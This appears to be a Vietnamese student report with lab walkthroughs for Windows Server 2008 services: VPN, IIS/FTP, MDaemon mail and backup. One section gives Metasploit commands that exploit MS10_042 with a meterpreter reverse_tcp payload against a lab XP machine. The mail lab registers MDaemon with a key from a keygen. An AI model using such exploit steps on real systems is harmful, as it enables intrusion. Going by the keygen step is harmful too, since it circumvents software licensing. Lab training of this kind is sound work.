Mục tiêu bài LAB: - Cài đặt Routing and Remote Access (LAN routing, VPN) - Cấu hình VPN cho phép PC 1 có thể truy cập vào máy PC 2. - Kiểm tra dịch vụ bằng thư mục chia sẻ trên PC 1. Thực hiện: Bước 1: Cài đặt Routing and Remote Access Trên máy Server 1, Server 2 tiến hành cài đặt dịch vụ Routing And
Remote Access. Vào Start Menu > Administrative Tools > Server Manager bấm vào
add Roles
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click chọn Network Policy and Access Services. > Next > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click chọn Routing and Remote Access Services. > Next > Install. Click Close sau khi cài xong.
Bước 2: Cấu hình Routing and Remote Access. Thực hiện trên Server 1 Vào
Start Menu > Administrative Tools > Routing and Remote Access.
Click phải chuột vào Server > Configure and Enable Routing
Remote Access
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
c
Click Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn dòng Custom configuration > Next
Chọn hai mục: VPN Access và LAN routing > Next > Finish > Start Service
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
R- Click Server > Propertices
Click chọn: Static address pool > Click Add
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Điền range IP: Start IP address: 192.168.1.50 End IP address: 192.168.1.100 > OK > OK Bước 3: Tạo tài khoản trên Server và cấp quyền truy cập VPN Start menu > Administrative tools > Server Manager
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong nhánh Configuration > Local Users and Group R-Click vào Users > New User
Điền thông tin user > Create > Close
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
R-Click vào User vpn > Propertices
Trong thẻ Dial- in Click chọn: Allow access > OK Bước 4: Tạo kết nối VPN trên máy PC 2: Trên máy PC 2
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Start menu > Settings > Control Panel > Network and internet connection
Chọn mục: Create a connection to the network at your workplace
Chọn mục: Virtual Private Network connection > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Điền thông tin công ty: Athena > Next
Điền IP của Server: 10.0.0.1 (Đây là IP NIC 2 của Server 1) > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn Add a shorcut to connection to my desktop > Finish
R-Click vào "Athena" chọn Connect
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Điền thông tin user name và password > Connect
Trên máy PC 2 tiến hành ping kiểm tra kết nối đến máy PC 1
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tín hiệu phản hồi từ PC 2 là rất tốt. Bước 5: Share thư mục trên PC 1 và tiến hành truy cập từ PC 2
Share thành công.
Kết thúc phần LAB VPN - Client to Site
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
4.8 IIS Chuẩn bị: - Máy Windows Server 2008: Server 1 - Máy Windows XP: PC 1 Mô hình LAB
Mục tiêu bài LAB: Cài đặt dịch vụ IIS trên Windows Server 2008 Ứng dụng dịch vụ IIS để triển khai Web Server và FTP Server Thực hiện: Bước 1: Cài đặt IIS Start menu > Administrative tools > Server Manager
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click Add Roles
Click chọn: Web Server (IIS)
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn Add Required Features Click NEXT > NEXT
Click chọn FTP Publishing Service
Click Add Required Services Click Next > InstallBước 2: Tạo một trang Web và kiểm tra
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tạo thư mục chứa trang Web đường dẫn: C:\athena\ Trong thư mục "C:\athena\" tạo một File tên: "index.htm"
Edit file này với Notepad và thêm nội dung là: Welcome to Athena.edu.vn >Save fileĐăng ký trang web này với IIS để truy cập bằng dịch vụ web. Start menu > Administrative > IIS
R-Click vào Sites > Add Web Site…
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Site name: athena Physical path: C:\athena > OKLưu ý: Khi thực hiện tạo web site mới trên cùng một cổng 80 thì sẽ
bị trùng với trang Default Web Site, cho nên ta phải Stop trang Default hoặc xóa nó đi. Kiểm tra: Mở trình duyệt Web gỏ vào địa chỉ: 192.168.1.1 để xem kết quả
. Bước 3: Tạo một FTP Site và kiểm tra Start menu > Administrative tools > IIS
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn FTP Sites > Click here to lauch
R-Click FTP Site > New > FTP Site
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click NEXT >
Đặt tên cho FTP Site > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click Next
Chọn Do not isolate users > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn đường dẫn thư mục Home của FTP site > Next
READ : Chỉ đọc WRITE: Cho phép ghi dữ liệu > Next > Finish
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Lưu ý quan trọng: FTP site mới nếu sử dụng cổng mặc định là 21 thì sẽ bị trùng với
các FTP Site khác cũng chung cổng 21. Trong cùng một thời điểm chỉ có một FTP site được
chạy trên cùng một cổng. Kiểm tra: Trên Windows XP - PC 1 Mở trình windows explorer: gỏ vào ô địa chỉ đường dẫn sau để truy
cập FTP Site: ftp://192.168.1.1 Tạo một thư mục trên FTP Site
4.9 Mail ServerMail Server chứa mailbox của người dùng. Mail Server nhận mail
từ mail Client gửi đến và đưa vào Mail Server nhận mail từ Mail Host
gửi đến và đưa vào mailbox của người dùng. Người dùng sử dụng NFS
(Network File System) để mount thư mục chứa mailbox trên Mail
Serverđể đọc. Nếu NFS không được hỗ trợ thì người dùng phải login
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
vào Mail Server để nhận thư.Trong trường hợp Mail Client hỗ trợ
POP/IMAP và trên Mail Server cũng hỗ trợ POP/IMAP thì người dùng
có thể đọc thư bằng POP/IMAP.
Cài đặt Mail Mdeamon
-> Next
Để mặc định rồi Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tiếp theo ta chọn mục keygen, ta coppy cái key vào Installation Type,sau đó chọn I already have a registrtion key(enter it here)
Điền thông tin ở phần Registration Information
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Gõ tên Domain: Athena.edu.vn
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Điền thông tin
Điền thông tin địa chỉ IP
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trên máy Sever vào Start Mdaemon
Tiếp tục để mặc định rồi Next -> Finish
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Xuất hiện hộp thoại,vào Accounts chọn Accounts settings
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Bỏ click chuột vào phần Require strong passwords
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tiếp vào Account chọn New Account,điền tên và pass địa chỉ mail tk1->ok
Ta làm tương tự cho tk2,
Sau đó,về lại máy Xp để thực hiện việc gởi và nhận mail
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tiếp tục mặc định chọn Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trước khi gởi mail ta sẽ phải nhập name Display
Sau đó điền địa chỉ Email
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Gõ địa chỉ IP của Mail sever
Nhập Pass
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn Create Mail để sọa thư gởi
Ta sẽ nhận được mail bên máy Xp2,với nội dung là xin chao bạnTiếp tục tương tự ta sẽ thực hiện gởi mail từ máy Xp2 sang Xp1 với nội dung thư “da nhan duoc”
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tiếp tục kiểm tra thư bên máy Xp1
Như vậy đã hoàn thành quá trình gởi và nhận mail trên 2 máy Xp1 và XP2
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
4.10 Khai thác mã lỗi MS10_042Đăng nhập bằng lệnh msfconsole
Khai thác mã lỗi MS10_042 bằng lệnh search ms10_042
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Sử dụng lệnh use copy mã lỗi
Tiếp theo ta sẽ gõ lệnh show options để coi các thuộc tính thông tin của mã lỗi
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Gõ Set srvhost -> Địa chỉ máy xp 192.168.232.129
Tiếp theo gõ set payload windowns/meterpreter/reverse_tcp
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Set lhost -> Địa chỉ IP máy back track:192.168.232.129
Gõ lệnh exploit,để xuất hiện mã lỗi,sau đó coppy mã lỗi qua máy XP để khai thác mã lỗi
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chúng ta sẽ cho nạn nhân truy cập vào mã lỗi vừa tạo
Chúng ta sẽ thấy địa chỉ máy XP đang truy cập là 192.168.232.128
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Gõ tiếp dòng lệnh Sessions,chúng ta sẽ thấy có một máy đang bị tấn công là máy XP có địa chỉ 192.168.232.128 thông qua bọt 1067
Tiếp tục dòng lệnh Sessions –i 1
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Gõ getuid để coi tên máy nạn nhân
Như vậy việc khai thác mã lỗi đã thành công
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
4.11 Mail Server trên VPSMô hình:
Mục tiêu:- Cài đặt dịch vụ Mail Server (sử dụng phần mềm Mdeamon_Mail)
trên máy chủ ảo (VPS)- Thực hiện kiểm tra gửi mail tới các tài khoản Gmail, Yahoo
mail… và ngược lạiLưu ý: Nếu thực hiện bài trên môi trường máy ảo VM-Ware
- Các card mạng để ở chế độ Host – Only- Nên tắt tường lửa trên Server và PC
Thực hiện:- Bước 1: Cài đặt phần mềm Mdeamon_Mail- Bước 2: Cấu hình Mdeamon_Mail- Bước 3: Tạo tài khoản trên Mdeamon_Mail
Bước 1: Cài đặt phần mềm Mdeamon_MailĐăng nhập máy chủ ảo VPS bằng công cụ Remote Desktop.Dowload bộ cài đặt Mdeamon và chạy file Setup.exe
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt
đầu quá trình cài đặt.Bấm "Next" để tiếp tục.
Đánh dấu vào ô "I have read and I agree with all the terms of this license agreement"
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài hệ điều hành Microsoft Windows).
Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới. Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Điền các thông tin phù hợp với vị trí, ở đây là VietNam
Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chờ đợi cho quá trình cài đặt hoàn tất.
Điền tên Domain chính xác ví dụ: phamthidiemkieu.vn
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Điền địa chỉ DNS chính (Primary) và dự phòng (Backup)
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Giữ nguyên lựa chọn "Setup MDaemon as a system service"
Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Giao diện sau khi cài đặt thành công.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tạo 1 tài khoảng mới vào Account New Account…
Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Qua Win XP1 tạo Client 1……Ta vào Outlook Express.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Cấu hình Out Look mail để quán lý mail cho tài khoảng
[email protected]. Nhập tên hiện thị vào Display name và click Next>
Nhập địa chỉ Email và Click Next>
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.
Nhập tên tài khoảng và mật khẩu. Click Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click Finish để hoàn tất cấu hình quản lý mail cho tài khoảng test.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Qua Win XP 2 tạo Client 2.
Nhập địa chỉ E-mail
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong cửa sổ Internet Connection Wizard điền thông tinTrong cửa sổ Internet Connection Wizard điền thông tin
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Nhập Mail và Pass để đăng nhậpQua máy Xp1 đê gởi Mail cho Xp2
Qua Xp2 kiểm tra Mail,ta thấy nội dung mail như đã gởi
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tiếp tục việc gởi Mail ngược lại từ Xp2 cho Xp1
Kiểm tra Mail bên máy Xp1
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tiếp tục trên máy Xp1 gởi mail đến địa chỉ mail thật
4.12 WINDOWS SERVER BACKUPI. Mục đíchWindows server backup là một tính năng mới trên hệ điều hành
Windows Server 2008 cung cấp chức năng lưu trữ (Backup), phục hồi dữ liệu (restore) và phục hồi hệ thống (Operating System Windows Recovery). Sẽ giúp cho người quản trị phục hồi nhanh chóng nếu hệ thống bị sự cố.
II. Các nội dung chính- Cài đặt Windows Server Backup.- Backup Server.- Restore File và Folder.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
III. Các bước thực hiện1. Cài đặt Windows Server BackupMở Administrator Tools Server Manager, click chuột phải
Feature Add Feature.Cửa sổ Select Feature, bung Windows Server Backup Feature
chọn Windows Server Backup Next.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Cửa sổ Comfirm Installation Selections, chọn Install. Sau khi cài đặt hoàn tất. Thì đóng cửa sổ lại.
2. Backup Full Server
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Mở Administrative Tools Windows Server Backup, vào Action chọn Backup Once… Cửa sổ Backup options, kiểm tra chọn
Different options, chọn Next.Cửa sổ Select backup configuration, chọn Full Server, chọn Next.Cửa sổ Select backup destination, trong ô Backup destination chọn ổ
cứng để lưu trữ file backup Next.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong hộp thoại Windows Server Backup Yes cửa sổ specify advance option, chọn VSS copy backup Next Backup.
Quá trình Backup đang diễn ra.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Cửa sổ Backup progress, kiểm tra backup thành công Close.
Mở Windows Explore, vào ổ cứng lưu file backup kiểm tra các folder WindowsImageBackup ( folder lưu trữ các file backup).
3. Restore File và FolderMở Windows Explore, vào ổ C xóa một vài thư mục ( giả sử server
bị mất dữ liệu).Mở Windows Server Backup trong Administrative Tools, vào
Action Recover… cửa sổ Getting started, chọn This Server Next.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Cửa sổ Select backup date, chọn đúng ngày lưu trữ file backup Next cửa sổ Select item to recover, bung ổ đĩa chứa folder cần Restore Next cửa sổ Specify recovery options, giữ cấu hình mặc định Next cửa sổ Confirmation, chọn Recover cửa sổ Recovery progress, kiểm tra folder restore thành công Close.
Mở Windows Explorer, vào kiểm tra Restore được foder.Vậy là đã hoàn thành Windows Server Backup trên Windows Server
2008.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Kết LuậnNhững vấn đề đạt được:
Cài đặt và cấu máy chủ Windows Server 2008 Cài đặt máy chủ quản trị miền Domain Controller Cấu hình máy chủ DHCP và DNS Cài đặt và cấu hình Mail Server trên Local và trên VPS Cài đặt và cấu hình Web Server trên Local Cài đặt và triển khai VPN Client to Site trên Local Sử dụng công cụ quản trị Server Manager trên Windows Server
2008 Tài khoản người dùng, tài khoản máy tính, nhóm và đơn vị tổ
chức Quản trị môi trường làm việc người dùng, máy tính sử dụng
chính sách nhóm Quản lý và cấp phép quyền truy cập tài nguyên Backup dữ liệu trên Windows Server 2008 Khai thác mã lỗi của System Hacking
Hướng phát triển của đề tài: Nghiên cứu và triển khai mô hình VPN Site to Site trên Local Mở rộng và đưa ra kế hoạch bảo mật mạng và máy chủ Đảm bảo tính khả dụng và khai phục hệ thống sau thảm họa Cài đặt và cấu hình VPN Site to Site trên VPS Cài đặt và cấu hình Web Server trên VPS
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Phụ lụcTài liệu tham khảo:
Tài liệu MCSA quản trị mạng trên Windows Server 2008 (Trung tâm Athena)
Một số Website: http://www.athena.com.vn/ http://www.nhatnghe.com/ http://www.google.com/ http://www.youtube.com/
Và một số tài liệu khác trên internetLink báo cáo:Slide Báo Cáo Cuối Kỳhttp://www.slideshare.net/LyND1473/bo-co-cui-k-34350320/Windows Server Backuphttps://www.youtube.com/watch?v=lz1xpoLRqsY/DHCP https://www.youtube.com/watch?v=AnmZGJR88TM&feature=youtu.be/DNS localhttps://www.youtube.com/watch?v=yN5a8L-zhXM&feature=youtu.be/Local Policyhttps://www.youtube.com/watch?v=1007li4xG9k&feature=youtu.be/Local Security Policyhttps://www.youtube.com/watch?v=LjuHSWdMA7Y&feature=youtu.be/Local User & Group